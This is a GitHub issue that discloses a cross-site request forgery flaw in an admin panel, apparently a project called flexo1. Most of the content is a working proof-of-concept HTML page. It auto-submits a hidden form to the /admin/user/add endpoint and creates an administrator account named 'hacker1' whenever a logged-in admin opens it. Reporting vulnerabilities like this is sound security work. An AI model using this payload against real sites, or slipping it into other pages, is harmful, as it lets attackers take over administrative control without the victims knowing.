-
Notifications
You must be signed in to change notification settings - Fork 4
Open
Description
- After administrator log in, there is a CSRF vulnerability that can add an administrator via /flexo1.source-master/admin/user
- poc
-csrf.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.98.99/flexo1.source-master/admin/user/add" method="POST">
<input type="hidden" name="user[name]" value="hacker1" />
<input type="hidden" name="user[email]" value="hacker1@hacker.com" />
<input type="hidden" name="user[username]" value="hacker1" />
<input type="hidden" name="user[password]" value="hacker" />
<input type="hidden" name="user[confirm]" value="hacker" />
<input type="hidden" name="user_permission[administrator]" value="1" />
<input type="hidden" name="user[language]" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
No labels